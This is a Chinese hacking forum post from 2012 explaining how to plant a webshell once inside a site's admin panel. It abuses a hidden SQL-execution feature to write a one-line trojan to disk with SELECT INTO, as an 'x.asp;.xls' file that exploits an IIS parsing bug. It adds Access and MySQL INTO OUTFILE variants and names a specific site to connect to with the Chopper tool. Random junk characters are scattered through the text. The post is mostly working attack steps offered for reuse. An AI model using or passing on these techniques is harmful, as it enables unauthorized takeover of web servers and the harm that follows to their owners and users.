好不容易进了后台,发现啥上传啊。备份啊多木有。# ^* [" Y( W2 @! W- m2 G
webshell一直拿不到。后来翻了一下源码。有一个执行SQL命令的- N$ j5 U2 W) G1 a
文件。可后台没显示这功能。直接填上文件名字,执行命令的选项出来了,
. g. V1 D; x1 }3 g然后就试用了下面的命令导出一句话木马。没想到成功了。命令方法如下:
4 g d" A0 b; L5 k3 J; O1.create table cmd (a varchar(50))
! N$ y$ @ Y% G* }9 l1 A8 L9 `( p* I2.insert into cmd (a) values (‘‘): Q$ X [8 o# W* n! W0 D6 Z) G
3.select * into [a] in ‘D:\wwwroot\www.koohik.com\hacker.asa;.xls’ ‘excel 4.0;’ from cmd
' j1 Y& P* }6 q" n {(把表cmd的内容导出为物理路径的一个EXCEL文件). y+ f8 Z* s4 N. |1 G, T
4.drop table cmd
/ l6 V0 x. @5 C6 k利用IIS的BUG成功拿到了WEBSHELL。2 Q, H l4 M0 ?! H5 z* k
$ w& D0 j5 J' v( ?2 [ y
直接菜刀里连接http://www.chouwazi.com/data/xiao.asp;xiao.xls一句话; Y# u9 ?# e6 M, J' }1 Q% i; h+ K
, x2 U! @ a; O- v: _1 R+ d: k SQL语句意思解释:
" N! r- g. I+ T" s( R- F9 ^ 第一句' i0 b' N( Y; S) s' L# ]( r Y" D
建立一个有一个A字段的表 表名为cmd 字段类型为字符 长度为50) o- k- }1 l# g" [
! j: u3 X c1 B3 g! [ 第二句! |) R2 i0 e% ~$ j8 F9 L
在表cmd的a字段插入一句话木马2 Y' T6 l4 v1 y3 p! {* H& `
第三句. |9 T- c) L4 q+ P6 M6 C
把cmd表a的内容导出到路径e:\host\chouwazi.com\web\data\的EXCEL文件8 b S9 C o( L5 x4 W# [3 n
& a7 T+ @8 i3 J5 H- Q/ g8 Z 第四句
; G0 v* S1 n6 r! {7 n* Q0 L8 t. \ 删除建立的cmd表, b; t7 _1 m4 s, [. Q+ z' \0 A
7 _% Z( a/ i; Z' g 以下内容为测试:
; c8 i! }+ S7 ^ \6 \ Access利用后台SQL执行命令功能导出WebShell:
0 o0 K: s" D& k h 这个更简单:
6 P* A5 m) X% E; }0 E9 L [ol][li]Select 'asp一句话木马' into [vote] in 'd:/chouwazi.com/x.asp;.xls' 'excel 8.0;' from vote [/li][/ol]
; J5 e0 P/ v, }# f' X' I' O 或者0 G, O/ V' F# n
[ol][li]Select 'php一句话木马' into outfile 'F:/wwwroot/chouwazi.com/eval.php'; [/li][/ol]7 r9 z& `- l1 c" ]4 p- A
/ k; c6 @% P4 Y4 C9 Y: g
后台有执行SQL语句功能(vote为已知表段)7 R1 N9 Y+ N) y/ Q0 h- O
希望对大家有所帮助拿shell的又一个思路
2 V. o$ _2 r; I7 i |
发表于 2012-9-13 17:53:58
收藏
支持
反对